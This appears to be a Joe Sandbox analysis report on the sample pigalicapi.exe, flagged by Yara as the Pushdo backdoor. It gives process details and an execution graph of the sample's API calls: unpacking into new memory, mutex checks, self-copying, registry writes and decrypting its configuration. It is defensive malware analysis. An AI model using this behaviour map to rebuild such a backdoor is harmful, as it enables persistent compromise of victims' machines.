                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Pushdo, Description: Yara detected Backdoor Pushdo, Source: 00000000.00000002.720083201.0000000002554000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                        Reputation:low

                                                                                                                                                                                                                                                                                        Target ID:1
                                                                                                                                                                                                                                                                                        Start time:14:50:05
                                                                                                                                                                                                                                                                                        Start date:31/05/2023
                                                                                                                                                                                                                                                                                        Path:C:\Users\user\pigalicapi.exe
                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\pigalicapi.exe"
                                                                                                                                                                                                                                                                                        Imagebase:0x800000
                                                                                                                                                                                                                                                                                        File size:545792 bytes
                                                                                                                                                                                                                                                                                        MD5 hash:6BB40ED95F770955EA7CF27E4785612E
                                                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Pushdo, Description: Yara detected Backdoor Pushdo, Source: 00000001.00000002.719025818.0000000002B54000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Pushdo, Description: Yara detected Backdoor Pushdo, Source: 00000001.00000002.714052838.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                                                                                        • Detection: 24%, ReversingLabs
                                                                                                                                                                                                                                                                                        Reputation:low

                                                                                                                                                                                                                                                                                        Target ID:4
                                                                                                                                                                                                                                                                                        Start time:14:50:13
                                                                                                                                                                                                                                                                                        Start date:31/05/2023
                                                                                                                                                                                                                                                                                        Path:C:\Users\user\pigalicapi.exe
                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\pigalicapi.exe"
                                                                                                                                                                                                                                                                                        Imagebase:0x800000
                                                                                                                                                                                                                                                                                        File size:545792 bytes
                                                                                                                                                                                                                                                                                        MD5 hash:6BB40ED95F770955EA7CF27E4785612E
                                                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Pushdo, Description: Yara detected Backdoor Pushdo, Source: 00000004.00000002.714243220.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Pushdo, Description: Yara detected Backdoor Pushdo, Source: 00000004.00000002.714796966.0000000000984000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                        Reputation:low

                                                                                                                                                                                                                                                                                        Target ID:5
                                                                                                                                                                                                                                                                                        Start time:14:50:48
                                                                                                                                                                                                                                                                                        Start date:31/05/2023
                                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                        Imagebase:0x3f0000
                                                                                                                                                                                                                                                                                        File size:44520 bytes
                                                                                                                                                                                                                                                                                        MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                                                                                                                        Target ID:7
                                                                                                                                                                                                                                                                                        Start time:14:51:05
                                                                                                                                                                                                                                                                                        Start date:31/05/2023
                                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                        Imagebase:0x3f0000
                                                                                                                                                                                                                                                                                        File size:44520 bytes
                                                                                                                                                                                                                                                                                        MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                                                                                                                        Target ID:9
                                                                                                                                                                                                                                                                                        Start time:14:51:17
                                                                                                                                                                                                                                                                                        Start date:31/05/2023
                                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                        Imagebase:0x3f0000
                                                                                                                                                                                                                                                                                        File size:44520 bytes
                                                                                                                                                                                                                                                                                        MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                                                                                                                        Target ID:10
                                                                                                                                                                                                                                                                                        Start time:14:51:23
                                                                                                                                                                                                                                                                                        Start date:31/05/2023
                                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                        Imagebase:0x3f0000
                                                                                                                                                                                                                                                                                        File size:44520 bytes
                                                                                                                                                                                                                                                                                        MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                                                                                                                        Target ID:11
                                                                                                                                                                                                                                                                                        Start time:14:51:23
                                                                                                                                                                                                                                                                                        Start date:31/05/2023
                                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                        Imagebase:0x3f0000
                                                                                                                                                                                                                                                                                        File size:44520 bytes
                                                                                                                                                                                                                                                                                        MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                                                                                                                        Target ID:12
                                                                                                                                                                                                                                                                                        Start time:14:51:24
                                                                                                                                                                                                                                                                                        Start date:31/05/2023
                                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                        Imagebase:0x3f0000
                                                                                                                                                                                                                                                                                        File size:44520 bytes
                                                                                                                                                                                                                                                                                        MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                                                                                                                        Target ID:13
                                                                                                                                                                                                                                                                                        Start time:14:51:25
                                                                                                                                                                                                                                                                                        Start date:31/05/2023
                                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                        Imagebase:0x3f0000
                                                                                                                                                                                                                                                                                        File size:44520 bytes
                                                                                                                                                                                                                                                                                        MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                                                                                                                        Target ID:14
                                                                                                                                                                                                                                                                                        Start time:14:51:44
                                                                                                                                                                                                                                                                                        Start date:31/05/2023
                                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                        Imagebase:0x3f0000
                                                                                                                                                                                                                                                                                        File size:44520 bytes
                                                                                                                                                                                                                                                                                        MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                                                                                                                                                                        Reset < >

                                                                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                                                                          Execution Coverage:8.1%
                                                                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:45.4%
                                                                                                                                                                                                                                                                                          Signature Coverage:17.4%
                                                                                                                                                                                                                                                                                          Total number of Nodes:1675
                                                                                                                                                                                                                                                                                          Total number of Limit Nodes:22
                                                                                                                                                                                                                                                                                          execution_graph 19003 2520000 19005 2520005 19003->19005 19008 252002d 19005->19008 19028 2520467 GetPEB 19008->19028 19011 2520467 GetPEB 19012 2520053 19011->19012 19013 2520467 GetPEB 19012->19013 19014 2520061 19013->19014 19015 2520467 GetPEB 19014->19015 19016 252006d 19015->19016 19017 2520467 GetPEB 19016->19017 19018 252007b 19017->19018 19019 2520467 GetPEB 19018->19019 19022 2520089 19019->19022 19020 25200e6 GetNativeSystemInfo 19021 2520109 VirtualAlloc 19020->19021 19026 2520029 19020->19026 19024 2520135 19021->19024 19022->19020 19022->19026 19023 25203c3 19030 2552720 19023->19030 19024->19023 19025 2520384 VirtualProtect 19024->19025 19025->19024 19025->19026 19029 2520045 19028->19029 19029->19011 19033 2551000 19030->19033 19036 2551030 LoadLibraryW GetProcAddress 19033->19036 19076 2551b30 19036->19076 19039 2551091 SetLastError 19072 255102b 19039->19072 19040 25510a3 19041 2551b30 SetLastError 19040->19041 19042 25510b9 19041->19042 19043 25510f0 19042->19043 19044 25510de SetLastError 19042->19044 19042->19072 19045 2551111 19043->19045 19046 25510ff SetLastError 19043->19046 19044->19072 19047 255111c SetLastError 19045->19047 19049 255112e GetNativeSystemInfo 19045->19049 19046->19072 19047->19072 19050 25511bc 19049->19050 19051 25511d7 SetLastError 19050->19051 19052 25511e9 19050->19052 19051->19072 19079 2551800 VirtualAlloc 19052->19079 19053 2551202 19054 255123d GetProcessHeap RtlAllocateHeap 19053->19054 19058 255122e SetLastError 19053->19058 19055 2551257 SetLastError 19054->19055 19056 255127b 19054->19056 19055->19072 19059 2551b30 SetLastError 19056->19059 19058->19072 19060 25512fb 19059->19060 19067 2551302 19060->19067 19080 2551800 VirtualAlloc 19060->19080 19061 2551320 19081 2551b50 19061->19081 19064 255136b 19064->19067 19087 25521a0 19064->19087 19151 25516c0 19067->19151 19069 25513ca 19069->19067 19070 25513eb 19069->19070 19071 25513ff GetPEB 19070->19071 19070->19072 19108 4003b00 19071->19108 19072->19026 19077 2551070 19076->19077 19078 2551b3b SetLastError 19076->19078 19077->19039 19077->19040 19077->19072 19078->19077 19079->19053 19080->19061 19082 2551b7d 19081->19082 19083 2551b30 SetLastError 19082->19083 19085 2551be9 19082->19085 19084 2551c32 19083->19084 19084->19085 19159 2551800 VirtualAlloc 19084->19159 19085->19064 19088 25513b5 19087->19088 19089 25521dd IsBadHugeReadPtr 19087->19089 19088->19067 19102 2551e80 19088->19102 19089->19088 19091 2552207 19089->19091 19091->19088 19160 2551840 LoadLibraryA 19091->19160 19093 255224d 19162 2551a20 19093->19162 19094 2552239 SetLastError 19094->19088 19097 2552273 SetLastError 19097->19088 19099 255229d 19099->19088 19100 25523ae SetLastError 19099->19100 19100->19088 19105 2551eba 19102->19105 19103 2551fe5 19104 2551d10 2 API calls 19103->19104 19107 2551fc1 19104->19107 19105->19103 19105->19107 19177 2551d10 19105->19177 19107->19069 19109 4003b0d 19108->19109 19185 4002ed0 19109->19185 19111 4003b1e GetModuleFileNameA SetUnhandledExceptionFilter CoInitialize 19188 4004510 19111->19188 19113 400400a ExitProcess 19114 4003b54 19114->19113 19206 4005700 19114->19206 19118 4003b9f 19240 4009400 19118->19240 19124 4003be1 19257 4005e00 CreateMutexA GetLastError 19124->19257 19126 4003beb StrStrIA 19258 4001120 19126->19258 19137 4003c92 19306 4005b50 19137->19306 19141 4003df8 19144 4003e30 19141->19144 19346 40078d0 19141->19346 19145 4003fed Sleep 19144->19145 19146 4004020 257 API calls 19144->19146 19149 4003f09 19144->19149 19333 4007970 19144->19333 19145->19113 19145->19144 19146->19144 19149->19144 19150 4003f62 VirtualFree 19149->19150 19350 40042e0 19149->19350 19355 4004020 19149->19355 19150->19149 19152 25516d7 19151->19152 19153 25516d2 19151->19153 19154 25519d0 VirtualFree 19152->19154 19153->19072 19158 255170b 19154->19158 19155 2551770 GetProcessHeap HeapFree 19155->19153 19157 25519d0 VirtualFree 19157->19155 19158->19155 19158->19157 19159->19085 19161 2551857 19160->19161 19161->19093 19161->19094 19163 2551a2c 19162->19163 19164 2551a35 19162->19164 19171 2551900 19163->19171 19168 2551a43 19164->19168 19170 25519f0 VirtualAlloc 19164->19170 19167 2551a51 19167->19168 19174 25519d0 19167->19174 19168->19097 19168->19099 19170->19167 19172 2551910 VirtualQuery 19171->19172 19173 255190c 19171->19173 19172->19173 19173->19164 19175 25519d9 VirtualFree 19174->19175 19176 25519ea 19174->19176 19175->19176 19176->19168 19178 2551d29 19177->19178 19182 2551d1f 19177->19182 19179 2551d37 19178->19179 19180 2551d9d VirtualProtect 19178->19180 19179->19182 19184 2551820 VirtualFree 19179->19184 19180->19182 19182->19105 19184->19182 19378 4003090 GetPEB 19185->19378 19187 4002edf 19187->19111 19189 40047e6 19188->19189 19190 4004528 19188->19190 19189->19114 19190->19189 19191 400455b GetModuleFileNameA CreateFileA 19190->19191 19191->19189 19192 40045a4 GetFileSize 19191->19192 19193 40047d0 19192->19193 19194 40045c6 VirtualAlloc 19192->19194 19193->19189 19195 40047d9 CloseHandle 19193->19195 19194->19193 19196 40045ef ReadFile 19194->19196 19195->19189 19197 4004625 19196->19197 19202 400466f 19196->19202 19198 4004637 FindCloseChangeNotification 19197->19198 19197->19202 19379 40047f0 19198->19379 19199 40047b2 VirtualFree 19199->19193 19202->19193 19202->19199 19203 4004681 VirtualFree 19205 400469f 19203->19205 19204 40047f0 15 API calls 19204->19205 19205->19202 19205->19204 19207 4003b84 19206->19207 19208 4005717 19206->19208 19227 4005a00 19207->19227 19399 4008f80 19208->19399 19214 4005773 19468 4005cd0 19214->19468 19217 40057d1 19218 40057e6 GetAllUsersProfileDirectoryA 19217->19218 19219 40057f9 GetEnvironmentVariableA 19217->19219 19220 4005810 wnsprintfA CreateFileA 19218->19220 19219->19220 19220->19207 19221 4005867 GetFileSize 19220->19221 19222 4005886 VirtualAlloc 19221->19222 19223 4005918 CloseHandle 19221->19223 19222->19223 19224 40058ab ReadFile 19222->19224 19223->19207 19225 4005904 VirtualFree 19224->19225 19226 40058e4 19224->19226 19225->19223 19226->19223 19228 4005b44 19227->19228 19229 4005a18 19227->19229 19228->19118 19229->19228 19230 4005a3a lstrcpyA 19229->19230 19493 4005930 19230->19493 19232 4005a62 19233 4005a74 lstrlenA 19232->19233 19233->19228 19234 4005a8c lstrcpyA lstrlenA lstrlenA 19233->19234 19234->19228 19235 4005abf lstrcatA RegCreateKeyExA 19234->19235 19236 4005b16 19235->19236 19237 4005b0a RegCloseKey 19235->19237 19239 4005b25 lstrcpyA 19236->19239 19238 4005b37 lstrlenA 19237->19238 19238->19228 19239->19238 19241 4003bcf 19240->19241 19244 400941a 19240->19244 19246 40099f0 GetCurrentProcess OpenProcessToken 19241->19246 19244->19241 19245 4009502 lstrcpyA CharUpperA 19244->19245 19497 4008bb0 19244->19497 19513 4009650 19244->19513 19245->19244 19247 4009a1f GetTokenInformation 19246->19247 19252 4003bd7 19246->19252 19248 4009a50 GetTokenInformation 19247->19248 19249 4009b76 CloseHandle 19247->19249 19248->19249 19250 4009a85 CreateWellKnownSid EqualSid 19248->19250 19249->19252 19251 4009ad4 CreateWellKnownSid EqualSid 19250->19251 19250->19252 19251->19252 19253 4009b0a CreateWellKnownSid EqualSid 19251->19253 19255 4006060 GetModuleFileNameA 19252->19255 19253->19252 19254 4009b40 CreateWellKnownSid EqualSid 19253->19254 19254->19249 19254->19252 19256 4006091 19255->19256 19256->19124 19257->19126 19259 400113a 19258->19259 19273 4001289 19258->19273 19260 4001144 lstrlenA 19259->19260 19259->19273 19261 4001156 lstrlenA 19260->19261 19260->19273 19262 4001168 19261->19262 19261->19273 19263 4001177 GetAllUsersProfileDirectoryA 19262->19263 19264 400118a GetEnvironmentVariableA 19262->19264 19265 40011a1 wnsprintfA lstrcmpiA 19263->19265 19264->19265 19266 4001216 19265->19266 19267 40011db 19265->19267 19522 40097a0 GetProcessHeap RtlAllocateHeap 19266->19522 19267->19266 19268 40011e3 CopyFileA SetFileAttributesA lstrcpyA 19267->19268 19268->19266 19270 4001220 lstrcpyA lstrcpyA CreateThread 19271 40012a3 19270->19271 19270->19273 19523 40012d0 19270->19523 19272 40097c0 2 API calls 19271->19272 19272->19273 19274 4005e30 19273->19274 19275 4005e64 RegOpenKeyExA 19274->19275 19276 4005e5d 19274->19276 19277 4005e8c RegQueryValueExA 19275->19277 19278 4003c39 19275->19278 19276->19275 19279 4005edc 19277->19279 19280 4005ebc 19277->19280 19285 4006cf0 19278->19285 19281 4005f15 RegCloseKey 19279->19281 19529 4009bd0 19279->19529 19280->19279 19282 4005ece RegDeleteValueA 19280->19282 19281->19278 19282->19279 19286 4006d13 RegOpenKeyExA 19285->19286 19287 4006d0c 19285->19287 19288 4006d3a RegQueryValueExA 19286->19288 19289 4003c4d 19286->19289 19287->19286 19290 4006d70 RegDeleteValueA 19288->19290 19291 4006d84 RegCloseKey 19288->19291 19292 4005f30 19289->19292 19290->19291 19291->19289 19533 4007d20 19292->19533 19295 4005f92 19296 4005f99 RegOpenKeyExA 19295->19296 19297 4005fc1 RegQueryValueExA 19296->19297 19298 4003c58 19296->19298 19299 4005ffc 19297->19299 19303 4009b90 19298->19303 19300 4006041 RegCloseKey 19299->19300 19301 4009bd0 QueryPerformanceCounter 19299->19301 19300->19298 19302 4006020 RegSetValueExA 19301->19302 19302->19300 19304 4009ba0 QueryPerformanceCounter 19303->19304 19305 4003c71 WSAStartup 19303->19305 19304->19305 19305->19113 19305->19137 19307 4005b67 19306->19307 19308 4003dac 19306->19308 19307->19308 19309 4005b7b lstrlenA lstrlenA 19307->19309 19320 4008a70 19308->19320 19314 4005ba3 19309->19314 19310 4005be0 VirtualAlloc 19310->19308 19313 4005c09 19310->19313 19311 4005bab StrStrIA 19312 4005bdc 19311->19312 19311->19314 19312->19310 19315 4005c7f 19313->19315 19316 4005c1f StrStrIA 19313->19316 19314->19310 19314->19311 19315->19308 19318 4005c91 VirtualAlloc 19315->19318 19316->19315 19317 4005c39 lstrcpynA 19316->19317 19317->19313 19318->19308 19319 4005cad 19318->19319 19319->19308 19321 4008ba3 19320->19321 19322 4008a87 19320->19322 19321->19141 19322->19321 19323 4008ab9 CryptAcquireContextA 19322->19323 19324 4008b12 19323->19324 19325 4008add GetLastError 19323->19325 19324->19321 19328 4008b1c CryptImportKey 19324->19328 19326 4008af8 CryptAcquireContextA 19325->19326 19327 4008aef 19325->19327 19326->19324 19327->19324 19327->19326 19329 4008b41 CryptImportKey 19328->19329 19330 4008b97 CryptReleaseContext 19328->19330 19331 4008b68 CryptDecrypt CryptDestroyKey 19329->19331 19332 4008b8d CryptDestroyKey 19329->19332 19330->19321 19331->19332 19332->19330 19334 4007987 VirtualAlloc 19333->19334 19335 4007ae9 19333->19335 19334->19335 19336 40079b6 19334->19336 19335->19144 19535 400a400 19336->19535 19339 4007ad8 VirtualFree 19339->19335 19340 4008a70 9 API calls 19341 4007a15 19340->19341 19341->19339 19342 4007a20 VirtualAlloc 19341->19342 19342->19339 19344 4007a5a 19342->19344 19343 4007ad0 19343->19339 19344->19343 19345 4007a89 inet_ntoa wnsprintfA 19344->19345 19345->19344 19347 4007965 19346->19347 19349 40078e4 19346->19349 19347->19144 19348 4007927 inet_ntoa wnsprintfA 19348->19349 19349->19347 19349->19348 19351 40044fd 19350->19351 19352 40042fa VirtualAlloc 19350->19352 19351->19149 19352->19351 19354 40044a3 19352->19354 19354->19351 19542 40092e0 19354->19542 19356 40042d7 19355->19356 19357 4004034 19355->19357 19356->19149 19357->19356 19358 400405f InitializeCriticalSection CreateEventA 19357->19358 19359 400409f 19358->19359 19360 40040ab EnterCriticalSection 19359->19360 19361 40042cd DeleteCriticalSection 19359->19361 19362 40040da 19360->19362 19363 40040bb VirtualFree 19360->19363 19361->19356 19364 40040e0 TerminateThread 19362->19364 19365 40040f3 ResetEvent LeaveCriticalSection CreateThread 19362->19365 19363->19362 19364->19365 19550 40097a0 GetProcessHeap RtlAllocateHeap 19365->19550 19551 4004ac0 19365->19551 19367 4004221 WaitForMultipleObjects WaitForSingleObject 19368 400424b 19367->19368 19369 400424f WaitForSingleObject 19367->19369 19368->19369 19370 4004273 EnterCriticalSection 19369->19370 19371 4004267 TerminateThread 19369->19371 19373 40042a2 LeaveCriticalSection 19370->19373 19374 4004283 VirtualFree 19370->19374 19371->19370 19372 400413a 19372->19367 19375 40041d5 CreateEventA CreateThread WaitForSingleObject FindCloseChangeNotification 19372->19375 19376 40097c0 2 API calls 19373->19376 19374->19373 19375->19372 19564 4004ba0 CoInitialize 19375->19564 19377 40042bb 19376->19377 19377->19361 19378->19187 19380 4004807 19379->19380 19381 4004665 19379->19381 19380->19381 19382 4004814 CryptAcquireContextA 19380->19382 19381->19202 19381->19203 19381->19205 19383 4004834 GetLastError 19382->19383 19385 4004856 19382->19385 19384 4004841 CryptAcquireContextA 19383->19384 19383->19385 19384->19385 19385->19381 19386 4004a9f CryptReleaseContext 19385->19386 19387 40048be CryptCreateHash 19385->19387 19386->19381 19388 4004a90 19387->19388 19389 40048f9 CryptHashData 19387->19389 19388->19386 19390 4004a83 CryptDestroyHash 19389->19390 19391 4004919 CryptDeriveKey 19389->19391 19390->19388 19391->19390 19392 400494a CryptDecrypt CryptDestroyKey 19391->19392 19392->19390 19393 4004995 CryptCreateHash 19392->19393 19393->19390 19394 40049b7 CryptHashData 19393->19394 19395 4004a76 CryptDestroyHash 19394->19395 19396 40049da CryptGetHashParam 19394->19396 19395->19390 19396->19395 19397 4004a11 CryptGetHashParam 19396->19397 19397->19395 19398 4004a3e 19397->19398 19398->19395 19400 400572e GetModuleFileNameA 19399->19400 19401 4008f9a 19399->19401 19439 4001ca0 CreateToolhelp32Snapshot 19400->19439 19401->19400 19402 4008fed GetVersionExA 19401->19402 19403 4009005 GetSystemInfo 19402->19403 19404 4009266 19402->19404 19406 4009115 19403->19406 19407 400901c 19403->19407 19404->19400 19405 400926c lstrcatA 19404->19405 19405->19400 19408 4009110 19406->19408 19411 4009174 19406->19411 19412 400912b 19406->19412 19409 4009042 19407->19409 19410 4009025 lstrcatA 19407->19410 19478 4009290 GetModuleHandleA GetProcAddress 19408->19478 19414 4009068 19409->19414 19415 400904b lstrcatA 19409->19415 19410->19408 19419 40091c3 19411->19419 19420 400917d 19411->19420 19416 4009134 lstrcatA 19412->19416 19417 400914e 19412->19417 19414->19408 19426 40090a1 GetSystemMetrics 19414->19426 19434 4009087 lstrcatA 19414->19434 19415->19408 19416->19408 19417->19408 19423 4009157 lstrcatA 19417->19423 19419->19408 19430 40091d5 lstrcatA 19419->19430 19431 40091ef 19419->19431 19421 40091a0 19420->19421 19422 4009186 lstrcatA 19420->19422 19421->19408 19429 40091a9 lstrcatA 19421->19429 19422->19408 19423->19408 19424 4009228 lstrlenA 19432 4009259 lstrlenA 19424->19432 19433 4009239 lstrcatA lstrcatA 19424->19433 19425 4009219 lstrcatA 19425->19424 19427 40090c7 GetSystemMetrics 19426->19427 19428 40090ad lstrcatA 19426->19428 19435 40090d3 lstrcatA 19427->19435 19436 40090ed 19427->19436 19428->19408 19429->19408 19430->19408 19431->19408 19437 40091f8 lstrcatA 19431->19437 19432->19404 19433->19432 19434->19408 19435->19408 19436->19408 19438 40090f8 lstrcatA 19436->19438 19437->19408 19438->19408 19440 4001e51 19439->19440 19441 4001cc9 Process32First 19439->19441 19457 4009d20 19440->19457 19442 4001e44 CloseHandle 19441->19442 19443 4001cee GetCurrentProcessId 19441->19443 19442->19440 19444 4001d04 19443->19444 19445 4001d20 Process32Next 19444->19445 19446 4001d12 19444->19446 19445->19444 19445->19446 19446->19442 19447 4001d44 Process32First 19446->19447 19447->19442 19448 4001d5f 19447->19448 19449 4001d71 lstrlenA 19448->19449 19450 4001e29 Process32Next 19448->19450 19451 4001e27 19449->19451 19452 4001d87 lstrcpyA OpenProcess 19449->19452 19450->19442 19450->19448 19451->19442 19452->19451 19453 4001dbb EnumProcessModules 19452->19453 19454 4001e02 GetProcessImageFileNameA 19453->19454 19455 4001de5 GetModuleFileNameExA 19453->19455 19456 4001e16 FindCloseChangeNotification 19454->19456 19455->19456 19456->19451 19458 4009d37 19457->19458 19459 4009f5d 19457->19459 19458->19459 19460 4009d4b GetSystemDirectoryA 19458->19460 19459->19214 19460->19459 19461 4009da8 GetVolumeInformationA 19460->19461 19461->19459 19462 4009deb 19461->19462 19481 4009f70 19462->19481 19466 4009f50 CoTaskMemFree 19466->19459 19467 4009f0c WideCharToMultiByte lstrcpynA 19467->19466 19469 4005ce7 lstrlenA 19468->19469 19470 400579d lstrcpyA 19468->19470 19469->19470 19471 4005cfa CreateFileA 19469->19471 19470->19217 19471->19470 19472 4005d23 GetFileSize 19471->19472 19473 4005d38 VirtualAlloc 19472->19473 19474 4005d9f FindCloseChangeNotification 19472->19474 19473->19474 19475 4005d54 ReadFile 19473->19475 19474->19470 19476 4005d7b 19475->19476 19477 4005d8e VirtualFree 19475->19477 19476->19477 19477->19474 19479 4009215 19478->19479 19480 40092bd GetCurrentProcess 19478->19480 19479->19424 19479->19425 19480->19479 19482 4009f87 19481->19482 19483 4009e2d StringFromCLSID 19481->19483 19482->19483 19489 40097a0 GetProcessHeap RtlAllocateHeap 19482->19489 19483->19466 19483->19467 19485 4009fb2 19485->19483 19486 4009fc8 GetAdaptersInfo 19485->19486 19488 4009ff4 19486->19488 19490 40097c0 19488->19490 19489->19485 19491 40097c9 GetProcessHeap HeapFree 19490->19491 19492 40097dc 19490->19492 19491->19492 19492->19483 19494 40059f3 19493->19494 19495 4005949 19493->19495 19494->19232 19495->19494 19496 40059de CharUpperA 19495->19496 19496->19495 19498 4008ce7 19497->19498 19499 4008bc7 19497->19499 19498->19244 19499->19498 19500 4008be5 CryptAcquireContextA 19499->19500 19501 4008c09 GetLastError 19500->19501 19502 4008c3e 19500->19502 19503 4008c24 CryptAcquireContextA 19501->19503 19504 4008c1b 19501->19504 19502->19498 19505 4008c48 CryptCreateHash 19502->19505 19503->19502 19504->19502 19504->19503 19506 4008c63 CryptHashData 19505->19506 19507 4008cdb CryptReleaseContext 19505->19507 19508 4008cd1 CryptDestroyHash 19506->19508 19509 4008c7b CryptGetHashParam 19506->19509 19507->19498 19508->19507 19509->19508 19510 4008ca3 19509->19510 19510->19508 19511 4008cab CryptGetHashParam 19510->19511 19511->19508 19512 4008ccb 19511->19512 19512->19508 19514 4009722 19513->19514 19515 4009667 19513->19515 19514->19244 19515->19514 19516 4009685 lstrlenA 19515->19516 19520 4009699 19516->19520 19517 40096fd lstrlenA 19518 4009715 lstrlenA 19517->19518 19519 400970c 19517->19519 19518->19514 19519->19518 19520->19517 19521 40096d4 lstrcatA lstrlenA 19520->19521 19521->19520 19522->19270 19524 40012fc 19523->19524 19525 40012e6 19523->19525 19525->19524 19526 400131d RegOpenKeyExA 19525->19526 19527 4001341 lstrlenA RegSetValueExA RegCloseKey 19526->19527 19528 4001378 Sleep 19526->19528 19527->19528 19528->19525 19530 4005ef6 RegSetValueExA 19529->19530 19531 4009bda 19529->19531 19530->19281 19531->19530 19532 4009b90 QueryPerformanceCounter 19531->19532 19532->19531 19534 4005f58 lstrcpyA lstrcatA 19533->19534 19534->19295 19534->19296 19536 40079d2 19535->19536 19537 400a417 19535->19537 19536->19339 19536->19340 19537->19536 19538 400a442 RegOpenKeyExA 19537->19538 19538->19536 19539 400a466 RegQueryValueExA 19538->19539 19540 400a490 RegCloseKey 19539->19540 19541 400a48a 19539->19541 19540->19536 19541->19540 19543 40093f8 19542->19543 19544 40092fa 19542->19544 19543->19354 19544->19543 19545 4009304 GetLocalTime 19544->19545 19547 4009322 19545->19547 19546 4008bb0 9 API calls 19546->19547 19547->19543 19547->19546 19548 4009650 5 API calls 